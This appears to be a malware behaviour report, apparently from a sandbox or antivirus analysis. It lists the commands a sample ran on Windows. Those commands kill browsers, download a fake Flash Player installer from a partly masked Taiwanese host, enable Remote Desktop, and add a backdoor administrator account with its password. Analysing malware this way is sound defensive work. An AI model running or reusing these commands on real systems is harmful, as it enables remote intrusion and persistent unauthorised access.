Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TermService] 'Start' = '00000002'
- '' (загружен из сети Интернет)
- '<SYSTEM32>\taskkill.exe' /im firefox.exe /f
- '<SYSTEM32>\taskkill.exe' /im iexplore.exe /f
- '<SYSTEM32>\netsh.exe' firewall set service type = remotedesktop mode = enable
- '<SYSTEM32>\taskkill.exe' /im chrome.exe /f
- iexplore.exe
- firefox.exe
- chrome.exe
- %TEMP%\flashplayer23axx_a_install.exe
- 'et###s.com.tw':80
- http://www.et###s.com.tw/tmp/adobe/update/flashplayer23axx_a_install.exe via et###s.com.tw
- DNS ASK www.et###s.com.tw
- ClassName: '' WindowName: ''
- '%TEMP%\flashplayer23axx_a_install.exe'
- '<SYSTEM32>\sc.exe' config termservice start= auto
- '<SYSTEM32>\sc.exe' start termservice
- '<SYSTEM32>\net1.exe' localgroup administrators SUPPORT_3863625 /add
- '<SYSTEM32>\net1.exe' user SUPPORT_3863625 !1ASDqweasdqwe /add
- '<SYSTEM32>\net.exe' user SUPPORT_3863625 !1ASDqweasdqwe /add
- '<SYSTEM32>\net.exe' localgroup administrators SUPPORT_3863625 /add
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f